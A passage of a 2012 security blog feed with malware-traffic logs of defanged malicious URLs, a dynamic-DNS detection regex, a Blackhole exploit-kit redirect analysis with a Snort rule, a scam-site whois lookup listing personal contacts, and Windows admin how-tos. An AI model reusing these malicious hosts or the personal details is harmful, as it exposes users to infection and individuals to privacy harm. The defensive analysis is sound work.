hxxp://report.o7o3179a1k931wsk.com/?Q93120=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%82l%98d%97%94%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0w%A6%9C%95ot%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%8AiubX%A2%D7%D8%AD%9F%A2%A4%5E%9Fi%9Fcagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%81icace%AB%89<br />
<br />
hxxp://update2.hpl4i1i6elvmn3.com/?i4=kdbTmsPWmJNlndHQZ5mSoZrI0arTnmpnnKfPpqPJlNnJWJHX3uCm2J3Vm9ep3s7hm1TQ2NGy0ceX1sdlj5%2BlzZicYcpuyc%2FbodRjZZyopdehl8anypZS<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?W79343=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%88j%9Ef%99%97%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0%7D%A4%A2%97qw%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%90g%7BdZ%A5%D7%D8%AD%9F%A2%A4%5E%9Fk%A2cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%87giceh%AB%89<br />
<br />
hxxp://update.9ik8rgxkc3zlg0.com/?xi=kdbTmsPWmI9wnsycpZfZo8eW36DNYGWcqKXXoZfGp8qSX8zapubZ59fPmOyp2pmV0ZXR1uTFntuoiH3duIPA2bG8oFnn1cttj8alz9ejxZipxpJsmcxw1srdn8ljsaWgaJCUotKo1ciF<br />
<br />
hxxp://billingshoper.com/p/?&lid=3060001&affid=60830&nid=F4C9B6B4&group=liv<br />
<br />
<br />
<br />
At this point, the user ran combofix, malware bytes and avg. Then, after 5 hours, these occurred, I am unsure if they are related to the infection, but centralops reports the registered owner as:<br />
<br />
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">person: Dariusz Mach
address: SuperHost.pl sp. z o.o.
address: ul. Slaska 9/1
address: 81-319 Gdynia
address: POLAND
phone: +48587396369 </pre>
<span style="font-family: 'Courier New', monospace; font-size: 13px;">fax-no: +48587396368</span><br />
<br />
hxxp://tiptoppoprock2.com/bv?type=js
<br />
<br />
hxxp://tiptoppoprock2.com/ga.js?W1u9=%98%D6%D9%D8%AC%A5%A0%B3%A7%B7%A0%A5%AFsf%96%A0%A3%8Bf%A8q%AA%9F%B3%B5%A4%B6%B1%A2%A2%A3%B1%A6%B0v_%89%E4%D6%BBn%A5_%EA%CE%E2%E7%D8%DF%DE%AC%A2%A4%A1%87<br />
<br />
1 minute later<br />
<br />
hxxp://tiptoppoprock2.com/gs.js?1&code=5053a968f1483&title=&keywords=&keywords_text=hollow%2Cnews%2Cny%2Cseptember%2Ccredit%2Cevents&ref=http%3A%2F%2Ftarrytown.patch.com%2F&u=7&pref=&utmcc=__utma%3D195079987.693177053.1333033673.1347020645.1347544109.23%2B__utmz%3D195079987.1344265429.12.4.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3Dsuffolk%20county%20pd%20contract&bd=<br />
<br />
After nearly an hour, the system ran Windows updates and was immediately followed by the following Get requests (rerverse chronological order here, oldest last). The /support/u and /support/ur are MIME octet-stream.<br />
<br />
<br />
<br />
hxxp://exasmicine.com/support/u<br />
hxxp://icturesofam.com/support/ur<br />
hxxp://icturesofam.com/support/u<br />
hxxp://icturesofam.com/support/u<br />
hxxp://icturesofam.com/support/u<br />
hxxp://exasmicine.com/support/u<br />
hxxp://menecalenesyny.com/support/u<br />
hxxp://uperctvalm.com/support/u<br />
hxxp://opateomin.com/u.php?0Q9oBPXEN0uECUgzEJ95RQsajz7vq1aG3F/2q5oNvBGAyHya0iCsG5//bBw9iKz11e/law==<br />
hxxp://yjbgcalof.com/support/u<br />
hxxp://dicasenowenuc.com/?ylOdR9GQqXquMlTvsmXlkaz1x3Ea+w==<br />
hxxp://dicasenowenuc.com/updates/msupdate.dat<br />
hxxp://sutonsbaym.com/updates/msupdate.dat<br />
hxxp://cguielinesfo.com/updates/msupdate.dat<br />
hxxp://cguielinesfo.com/updates/msupdate.dat<br />
hxxp://www.update.microsoft.com/v9/1/windowsupdate/redir/muv4wuredir.cab?1209142251<br />
<br />
<br />
exasmicine.com - Registrar is Bizcn.com<br />
menecalenesyny.com- Registrar is Bizcn.com<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com1tag:blogger.com,1999:blog-407866255126559296.post-26170770144639734942012-09-14T11:50:00.000-07:002012-09-14T11:50:00.594-07:00Updated FreeDNS RegexFor those of you that find this useful.<br />
<br />
\.(mefound|keren|ftp1|edns|compress|authorizeddns|almostmy|4pu|1dumb|qhigh|proxydns|almostmy|dyndns-ip|gr8domain|ns01|25u|ns3|4dq|ns1|portrelay|dnsrd|lflinkup|changeip|dns-stuff|dnset|faqserv|qpoe|4mydomain|cleansite|toythieves|trickip|ns3|kwik|dnsalias|verymad|twighlightparadox|jumpingcrab|ignorelist|crabdance|chickenkiller|dvrdns|findhere|byinter|looking|qc|mooo|info|dyndns|dyndns-at-home|dyndns-at-work|dyndns-home|dyndnsoffice|dyndns-web|dyndns-blog|dyndns-wiki|dyndns-pics|zapto|sytes|servequake|servepics|servemp3|servehttp|servehalflife|servegame|serveftp|servecounterstrike|serveblog|servebeer|redirectme|bounceme|hopto|myvnc|no-ip|myftp|dlinkddns|everfocusddns|freeddns|bddns|ddns|lorexddns|newddns)\.(com|net|info|org|ms|me|vc|pl|mobi|us|name|tm|biz|fr|be|ws|dk|tv|to|at|la)Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-48739935010565160072012-08-13T14:12:00.002-07:002012-08-14T11:18:21.998-07:00FreeDNS Provider Regexby Frank Angiolelli, CISSP<br />
<br />
Updated regex for free dynamic dns providers.<br />
<br />
The leading . limits hits from legitimate sites. Enjoy.<br />
<br />
\.(dnsalias|verymad|twighlightparadox|jumpingcrab|ignorelist|crabdance|chickenkiller|dvrdns|findhere|byinter|looking|qc|mooo|info|dyndns|dyndns-at-home|dyndns-at-work|dyndns-home|dyndnsoffice|dyndns-web|dyndns-blog|dyndns-wiki|dyndns-pics|zapto|sytes|servequake|servepics|servemp3|servehttp|servehalflife|servegame|serveftp|servecounterstrike|serveblog|servebeer|redirectme|bounceme|hopto|myvnc|no-ip|myftp|dlinkddns|everfocusddns|freeddns|bddns|ddns|lorexddns|newddns)\.(com|net|info|org|ms|me|vc|pl|mobi|us|name|tm|biz|fr|be|ws|dk|tv|to|at)$<br />
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-20079505657025475782012-05-09T07:56:00.000-07:002012-05-09T09:51:10.896-07:00SQL Injection Redirect to Blackhole from Religious SiteWritten by Frank Angiolelli, CISSP<br />
<br />
<a href="http://www.pcmag.com/article2/0,2817,2403960,00.asp" target="_blank">Recent metrics from Symantec</a> are showing that religious sites are more often compromised or serving malicious content than adult content sites. In a recent analysis, I have encountered this myself and I will delve briefly into how the malicious event occurred.<br />
<br />
User searches in Google for religious content<br />
<br />
User clicks on the link, in this case, fassatiny.com, a youth religious website.<br />
<br />
Unbeknownst to the user or, likely, fassatiny.com, the website has been injected with obfuscated javascript code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMoqq0M_P_t-95XmjAHCcInSqwOtCojfywhvixG4howHOc9ZVbqqo9fWBss5AVUsHiICIJHBnlzoKGg5olgcsZPctLB0EwJ3-JiWU_rlW7nsKOun4g9YdU5pS8hWe8E8hTCqkwR9mnvI/s1600/frassatiny.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMoqq0M_P_t-95XmjAHCcInSqwOtCojfywhvixG4howHOc9ZVbqqo9fWBss5AVUsHiICIJHBnlzoKGg5olgcsZPctLB0EwJ3-JiWU_rlW7nsKOun4g9YdU5pS8hWe8E8hTCqkwR9mnvI/s640/frassatiny.jpg" width="640" /></a></div>
<br />
<ul>
<li>The result of this code is a get request for: <b>khigaijc.ddns.ms/stds/go.php?sid=1</b></li>
<li><a href="http://jsunpack.jeek.org/?report=d55b34d070095158ed87123ef1d828c4c16f5139">http://jsunpack.jeek.org/?report=d55b34d070095158ed87123ef1d828c4c16f5139</a></li>
</ul>
<br />
<br />
<ul>
<li>khigaijc.ddns.ms/stds/go.php?sid=1 redirects you to: </li>
<li>hxxp://lnuzdqhs.ddns.mobi/main.php?page=bd9afdd8df7aa34c</li>
</ul>
<br />
<b><br /></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx1i7q8jwRjZ-fNOkzxP39_W3dxGvcEKrQV74QdiEBW0TfQC2wKeDQkLJZBxGPkMApbJH32vCVJbndnTr_XnslVxXuWrbgGda-u9RfjDuqVSwk9dHK-0OlgfoiafzA355UL3vYEVgz9to/s1600/blackhole.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx1i7q8jwRjZ-fNOkzxP39_W3dxGvcEKrQV74QdiEBW0TfQC2wKeDQkLJZBxGPkMApbJH32vCVJbndnTr_XnslVxXuWrbgGda-u9RfjDuqVSwk9dHK-0OlgfoiafzA355UL3vYEVgz9to/s640/blackhole.JPG" width="640" /></a></div>
<b><br /></b><br />
An you have yourself a new experience. Malware via blackhole and insecure religious websites. I, in no way wish to pick on religious websites. They are far from the only insecure websites on the internet.<br />
<br />
Anyone can fall a victim to this type of injection, and anyone can fall victim to exploits akin to this.<br />
<br />
Now, lets take this one step further:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmRfWSlgwBt4jIbLubz3e3RUTSFuwiQbHJ5uW_rfZ3kv-zq9MJWLJufg9v8nlXJXirFptQ3o68AEcTPnV6Ax327hpdCS2N2dH8LwCyB3bagC6jOo6crOZKiur13hddABik_mX6gHU-Xw/s1600/sqlinjection.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmRfWSlgwBt4jIbLubz3e3RUTSFuwiQbHJ5uW_rfZ3kv-zq9MJWLJufg9v8nlXJXirFptQ3o68AEcTPnV6Ax327hpdCS2N2dH8LwCyB3bagC6jOo6crOZKiur13hddABik_mX6gHU-Xw/s640/sqlinjection.JPG" width="608" /></a></div>
<br />
<br />
<b>Lotta trouble out there.</b><br />
<b><br /></b><br />
<b>Now, let's detect. How about snort?</b><br />
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Exploit: Malicious Obfuscated Javascript Redirect"; flow:from_server,established; content:"<script>i=0;try{prototype;}catch"; content:"</script>"; reference:url,http://jsunpack.jeek.org/?report=d55b34d070095158ed87123ef1d828c4c16f5139, reference:fortknoxnetworks.blogspot.com/2012/05/anatomy-of-compromised-religious-site.html; sid:98100014; rev:1;)<br />
<br />
<b>Other tools:</b><br />
Obfuscated javascript<br />
Nginx server<br />
URL strings consistent with Blackhole<br />
<br />
<br />
I put the trailing <script> into this rule in the desire to capture the entire script. You may have a better suggestion for the rule and I welcome it.<br />
<br />
As always, I welcome your comments, thoughts and suggestions. Follow me @fknsec.<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-51159275310213239762012-03-23T10:42:00.003-07:002012-03-23T13:56:43.397-07:00thecheapostore.com - The face of Identify Theft?<span style="font-size: large;"><br /></span><br />
<span style="font-size: large;">TheCheapOStore.com - Everything is sold for 99 cents, including your identity?</span><br />
<br />
Thecheapostore.com is an anomoly in a world of cheap stuff and people searching for the cheapest stuff. At the thecheapostore.com you can buy anything for 99 cents but whether anything actually gets sold is another question.<br />
<br />
As you might probably guess, I am constantly making my friends and family aware of malicious internet "stuff". Apparently, they listen.<br />
<br />
My wife approached me yesterday to tell me about what she considered a funny story about a website where she was trying to puchase something. The website was called thecheapostore.com. Apparently, everything is on auction and everything costs 99 cents.<br />
<br />
There were two funny things about it she told me. The first was that when she tried to purchase, my network identity theft protection fired off an prevented her from going to the website . The second was that all auctions start at 99 cents, end in 30 minutes, but if you refresh your browser, the clock starts again.<br />
<br />
"DING!"<br />
<br />
So I asked her to show me the site. Here is my short analysis:<br />
<br />
The site itself is a simple front end showing "Latest Products", and it opens rather slow, presumably because it is a DSL connection as reported by centralops.<br />
<br />
The products are presented to you in an iframe from another website madsem.com<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtZNTAOoxep4c3YvNh3T9iBl5hbrwG4tFsCuQR_9LUoPkRSPQBqPQnycgwTwrfwttCDB31V14-gEihyphenhyphenIXqoRmvx-UyXNhK04WWJkpOQHk1HyyoLGRIrr9fPKl6hIblafJktAIMqioa80c/s1600/thecheapostore.com.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtZNTAOoxep4c3YvNh3T9iBl5hbrwG4tFsCuQR_9LUoPkRSPQBqPQnycgwTwrfwttCDB31V14-gEihyphenhyphenIXqoRmvx-UyXNhK04WWJkpOQHk1HyyoLGRIrr9fPKl6hIblafJktAIMqioa80c/s400/thecheapostore.com.jpg" width="400" /></a></div>
<br />
<br />
<iframe src="http://campaigns.madsem.com/magentoshops/index.php" width="350" height="280" frameborder="0" scrolling="no"></iframe><br />
<br />
<div style="text-align: center;">
<b>Now, go to madsem.com</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b>It says only.</b></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;">"welcome Biatches :)"</span></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKUkIMH2OUIKL4oiEJwx3Q0M0A4j25Rt8Cbyc8vMUJoRDNrDy2XIsVftw-cJPl2SbdIIvmAH5sIH4ifgEXEEAGfgkKuhPuWdvwQKQCxubIya0qmHiyXaog4rMt6ZjnIFD0E-hoSrSzNdk/s1600/welcomebiatches.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKUkIMH2OUIKL4oiEJwx3Q0M0A4j25Rt8Cbyc8vMUJoRDNrDy2XIsVftw-cJPl2SbdIIvmAH5sIH4ifgEXEEAGfgkKuhPuWdvwQKQCxubIya0qmHiyXaog4rMt6ZjnIFD0E-hoSrSzNdk/s1600/welcomebiatches.jpg" /></a></div>
<br />
So what exactly happens to your information when you click "Send". Someone has it. And he thinks your a biatch.<br />
<br />
My suggestion is to research websites before you send their information or making a purchase.<br />
<br />
http://www.scamadviser.com/is-thecheapostore.com-safe.html<br />
http://www.webutation.net/go/review/thecheapostore.com#<br />
http://answers.yahoo.com/question/index?qid=20120314153644AArQVTz<br />
<br />
Registrant:<br />
Domains By Proxy, LLC<br />
DomainsByProxy.com<br />
15111 N. Hayden Rd., Ste 160, PMB 353<br />
Scottsdale, Arizona 85260<br />
United States<br />
<br />
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)<br />
<br />
IP Address:<br />
82.211.28.22<br />
ACCELERATED IT SERVICES GMBH<br />
Germany<br />
DAWN-SERVER.DE<br />
ip2location.com lists this as a DSL connection<br />
<br />
Queried whois.ripe.net with "-B 82.211.28.22"...<br />
<br />
% Information related to '82.211.28.0 - 82.211.28.255'<br />
<br />
inetnum: 82.211.28.0 - 82.211.28.255<br />
netname: DE-MEDIA-IP-NETWORK-20110823<br />
descr: Media IP Network<br />
country: DE<br />
admin-c: HN1156-RIPE<br />
tech-c: HN1156-RIPE<br />
status: ASSIGNED PA<br />
remarks: ************************************************<br />
remarks: * ABUSE CONTACT: medianetworksg@gmail.com IN *<br />
remarks: * CASE OF HACK ATTACKS,ILLEGAL ACTIVITY, *<br />
remarks: * VIOLATION, SCANS, PROBES, SPAM, ETC. *<br />
remarks: ************************************************<br />
mnt-by: ACCELERATED-MNT<br />
changed: nk@accelerated.de 20110823<br />
source: RIPE<br />
<br />
person: Hang Nguyen<br />
address: Duong 8B Pho 4 Bin An, Quan 2<br />
address: Saigon, Vietnam<br />
phone: +84 906482860<br />
e-mail: medianetworks@gmail.com<br />
nic-hdl: HN1156-RIPE<br />
mnt-by: ACCELERATED-MNT<br />
changed: lir@accelerated.de 20110623<br />
source: RIPE<br />
<br />
% Information related to '82.211.0.0/18AS31400'<br />
<br />
route: 82.211.0.0/18<br />
descr: IP-Routing by Accelerated IT Services GmbH<br />
origin: AS31400<br />
mnt-by: ACCELERATED-MNT<br />
changed: nk@accelerated.de 20080709<br />
source: RIPE<br />
<br />
Traceroute<br />
<br />
6 TenGigE0-0-1-0.GW14.BOS4.ALTER.NET (152.179.2.97) 80.593 ms 81.399 ms 81. 276 ms<br />
7 0.ge-0-3-0.XL4.BOS4.ALTER.NET (152.63.17.134) 80.176 ms 86.179 ms 85.477 ms<br />
8 0.xe-7-0-3.XL4.IAD8.ALTER.NET (152.63.2.106) 105.865 ms 103.278 ms 112.64 8 ms<br />
9 0.ae4.BR1.IAD8.ALTER.NET (152.63.33.121) 104.557 ms 117.249 ms 97.695 ms<br />
10 194.25.211.17 (194.25.211.17) 102.064 ms 111.042 ms 182.673 ms<br />
11 f-ed6-i.F.DE.NET.DTAG.DE (62.156.131.242) 259.001 ms 194.25.6.90 (194.25.6. 90) 256.655 ms 251.036 ms<br />
12 80.156.160.162 (80.156.160.162) 260.455 ms 242.994 ms 241.802 ms<br />
13 fra4.xe-0-1-0.accelerated.de (84.200.230.81) 225.309 ms 224.549 ms 212.82 0 ms<br />
14 82.211.28.22 (82.211.28.22) 228.830 ms 216.740 ms 215.035 ms<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-88034116180416650522012-03-08T09:50:00.001-08:002012-03-08T09:50:32.877-08:00Why Forwarding Email to a Free Email Provider is a Bad Idea<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span><br />
<span style="font-size: x-small;">www.fortknoxnetworks.com</span><br />
<br />
In many cases, we must balance availability against confidentiality. The two are not necessarily mutually exclusive, but in general by increasing confidentiality you decrease availability at least in terms of methods, locations and speed of access.<br />
<br />
<b><span style="font-size: large;">Why Forwarding Your Email to A Free Email Provide is Good</span></b><br />
<br />
The benefits of such an action are easy to see:<br />
1. Easier access to the emails.<br />
2. Accessible from any computer without hoops to jump.<br />
3. Easier to configure phones and mobile devices to receive<br />
4. Synchronization options with mobile devices<br />
<br />
I have seen cases where this has been done by individuals that just wanted the convenience, did not know how to access their email securely and I have seen cases where a cell phone provider was just trying to help someone access their email but did not know the proper settings, so they assisted with forwarding all the email and setup the phone to receive the forwarded mail.<br />
<br />
<b><span style="font-size: large;">Why Forwarding Your Email to A Free Email Provide is Bad</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Z1zO6pwvVQkEfyqPOveg7YS59Xwi17xDSs65Mx5JFu9NUZL9w3rRg-YdDDkFT7qScHechc-r9Cbb41DPs10vWHUzpiOxgfUtEJz75zEXPTyYmi2dB1MtRf95BaarAJL4RgD-QDwsCC0/s1600/1.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Z1zO6pwvVQkEfyqPOveg7YS59Xwi17xDSs65Mx5JFu9NUZL9w3rRg-YdDDkFT7qScHechc-r9Cbb41DPs10vWHUzpiOxgfUtEJz75zEXPTyYmi2dB1MtRf95BaarAJL4RgD-QDwsCC0/s320/1.jpg" width="309" /></a></div>
<br />
The costs associated with this can be tremendous. The primary cost is the considerable lessening of confidentiality. While it is true that most free email solutions provide encryption by default, these services are available to anyone on the web from any computer without restriction. Additionally, their password reset mechanisms are available to anyone on the web.<br />
<br />
Beyond that, there is no incident response team attempting to identify unauthorized accesses. Furthermore, audits of who is accessing the system are not possible.<br />
<br />
This sets up your organization for the possibility of a malicious individual creating a channel to read corporate email without detection. <a href="http://www.geek.com/articles/news/anonymous-leaks-fbi-conference-call-about-anonymous-2012023/" target="_blank">Take for example the FBI Conference call which was recorded by Anonymous. </a>In this case, an FBI agent had apparently forwarded the conference call details to a free email provider, but the account password had been compromised by the hackers. The result was hackers recording the conference call, which ironically was related to hacking investigations, and posting it to the internet.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMplA7ygB3stF7FECTQKPlsdgsLFOq-xNO0IMKJ2WEJglPGprl-7NEjMUib2IgWuq9a3ft4muCHE4Cr433NM8XLXoHztuGN77FDtCPjyQvQT2mtf0Yb5oNrk5aPshIbWTTX5LM12TRJ2U/s1600/anti.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMplA7ygB3stF7FECTQKPlsdgsLFOq-xNO0IMKJ2WEJglPGprl-7NEjMUib2IgWuq9a3ft4muCHE4Cr433NM8XLXoHztuGN77FDtCPjyQvQT2mtf0Yb5oNrk5aPshIbWTTX5LM12TRJ2U/s200/anti.jpg" width="200" /></a></div>
<br />
What is worse then someone posting the information to the internet? Someone not posting the information and silently, persistently reading the email and information without detection or limits.<br />
<br />
In this case where a phone conference was hacked, the forwarding of email to a free email provider was used to further gain access to secure operations, in this case a conference call discussing current investigations. Without disclosing that this had occurred, the malicious individuals could have monitored the email for any other systems which they could access and maintained or even extended their access.<br />
<br />
How To Prevent This<br />
1. Block access to webmail providers<br />
2. Monitor mail servers for email forwarding<br />
3. Implement DLP systems<br />
4. Ensure this behavior is restricted by policy<br />
5. Train employees <br />
<br />
As always, I welcome thoughts and suggestions.Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-50195334047394108242012-02-14T07:39:00.000-08:002012-02-15T13:56:30.141-08:00Converting RRAS Logs Into MySQL Database<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-size: x-small;">Written By: Frank Angiolelli, CISSP</span><br />
<a href="http://www.fortknoxnetworks.com/"><span style="font-size: x-small;">www.fortknoxnetworks.com</span></a><br />
<br />
This discussion is about how to automatically pull the RRAS files and
convert them into a formatted CSV file which can be imported
automatically into a SQL database for querying and reporting.
There are tools available that provide a manual interface or the capability to open the files and view them manually and discussion of them is outside the scope of this article.<br />
<br />
First and foremost, Windows Servers typically log RRAS connections to %windir%\system32\logfiles and in my case, the files were called in12??.log (in1201.log, in1202.log, etc... presumably the 12 is the year and the ?? is the log file number).<br />
<br />
Secondly, the format for RRAS logs is multi-line which is somewhat of an irritation, however can be worked around using find and piping the output.<br />
<br />
In the case I was reviewing, the client had Server 2003 using Windows Authentication. Your case may be different and this may be a good starting point.<br />
<br />
Running the following find command against the logs extracts what for this example are the usable portions of information concerning login.<br />
<br />
<div style="color: red;">
find /I "Use Windows Authentication" %windir%\system32\logfiles\in*.log</div>
<br />
The output will look something like this<br />
<span style="color: orange;">"SERVERNAME","RAS",02/14/2012,10:02:14,4,"username",,,"<WAN IP ADDRESS>",,"<LAN IP ADDRESS>", ,"<SERVER IP ADDRESS>",132,,"<SERVER IP ADDRESS>",,132329231734,,5,,1,2,,,0,"311 1 <SERVER IP ADDRESS> 01/26/</span><br />
<span style="color: orange;">2012 13:48:05 123",,,,,1,,,,"204",2,,,,,"275",1,,1,1,"<WAN IP ADDRESS>",,,,,,,,"MS</span><br />
<span style="color: orange;">RASV5.20",311,,"0x00414C4142",4,,"Use Windows authentication for all users",,,,"</span><br />
<span style="color: orange;">MSRAS-0-<REMOTE COMPUTERNAME>","MSRASV5.20" </span><br />
<br />
For those of you not familiar with using the For /f command check out this <a href="http://ss64.com/nt/for_cmd.html" target="_blank">link</a>.<br />
<br />
Now, let's output all that information into a single file which we can use.<br />
<br />
<div style="color: red;">
find /I "Use Windows Authentication" %windir%\system32\logfiles\in*.log >> raslog.output.csv</div>
<br />
Once all of that information is outputted to a single csv file, we can use the information presented, however we will need to extract only the useful parts that we want. It is not helpful to have a csv file with 35 columns of which we need, say 7. No need to re-invent the wheel here, the tokens we want are 1,3,4,6,7,8 and 31.<br />
<br />
Let's go get them. Don't forget to adjust to single %'s if you are not calling this from a batch script.<br />
<br />
<div style="color: red;">
for /f "tokens=1,3,4,6,7,8,31 delims=," %%a in ('find /I "Use Windows authentication" %windir%\system32\logfiles\in*.log') do echo %%a, %%b, %%c, %%d, %%e, %%f, %%g>> raslog.csv</div>
<br />
Wonderful. Some suggestions here would be to use your tool of choice to schedule this as a task and have the output file placed in a location where it can be imported easily into your SQL system, unless you import directly from the RRAS server.<br />
<br />
Now schedule that into a batch script and execute using your scheduled task operator or other task scheduler user. Now we have useful information. Notice in your output file, there are three lines for each connection and one for each disconnection and the most useful line is in this format.<br />
<br />
"SERVER", 02/14/2012, 07:59:44, "username", "WANIP", "Assigned Lan IP", "MSRAS-0-Computername"<br />
<br />
Import that data to a SQL database of your choice, create a front end using <insert web stuff here> and you have usable data which can now be aggregated, sorted and queried. <br />
<br />
Each scenario and implementation will be different, please feel free to contact me if you would like assistance with your systems. I welcome any comments or improvements, as well as observations of your scenarios.Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-69518771729482231642012-02-14T06:45:00.000-08:002012-02-15T13:56:43.113-08:00Using WMIC To Create SOC Based Inventory of Executables<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjl8ASbP825hWQeGt-ZBykcSFZjK2Fvq5uCCg2f_8k8lhkQ7ROL490Ko6h4Zq97S2WdbBTYn4cMJFTFDZoxWv_vm8Qubsyqv6FzxsJncuvhDKxFY6lDDvlsFVLo8i2jk6ugW1UFXLOG3U/s1600/fortknox-transparent.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div>
<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span> <br />
<span style="font-size: x-small;"><a href="http://www.fortknoxnetworks.com/">www.fortknoxnetworks.com</a></span><br />
<br />
<u>Using WMIC To Create SOC Based Inventory of Executables</u><br />
<br />
As many of us know, <a href="http://technet.microsoft.com/en-us/library/bb742610.aspx">WMIC</a> is an exceptionally powerful tool for collecting information. When coupled with additional tools, a useful and actionable collection of material can be created that provides visibility across an enterprise.<br />
<br />
For example, leveraging WMIC to collect all running processes and inventory that data is an interesting use case. For those of you unfamiliar with wmic, the following command can get you started (Pro versions of Windows only):<br />
<br />
<div style="color: red;">
wmic process list brief /format:list</div>
<br />
The information presented provides HandleCount, Name, Priority, Process ID, Threadcount and WorkingSetSize. Interesting information to say the least, however without the actual paths, usefulness is limited.<br />
By running the following command, we can discover all the information presentable:<br />
<br />
<div style="color: red;">
wmic process list /?</div>
<br />
This is a lot of information, not all of which is usable. For my purposes, I choose the following information. Name, ProcessID, Executablepath. The Name will show you the executable, the ProcessID is useful information if you need to executable something based on your query and the Executablepath shows you the location of the executable on the system.<br />
<br />
<span style="color: red;">wmic process get name,processid,executablepath</span><br />
<br />
Now as we start to move into useful information, we need to edit formatting and output it to a file that again is useful. This can be achieved using the format and output commands.<br />
<br />
<span style="color: red;">wmic /output:%computername%.csv process get name,processid,executablepath /format:csv</span><br />
<br />
Now we have an output of a file that is useful for our purposes. When looking at the csv file, you will notice that the first column is called "Node" which indicates the computername variable. <br />
<br />
Without going too in depth, this information can be collected, transported or queried from a centralized location and then input into a database engine of your choice. For example, inputting into MySQL can be done with multiple files using a type command for all csv files created/collected and then running something like. I have not used this with all queries run from a single system as of writing of this article, but this seems quite possible.<br />
<br />
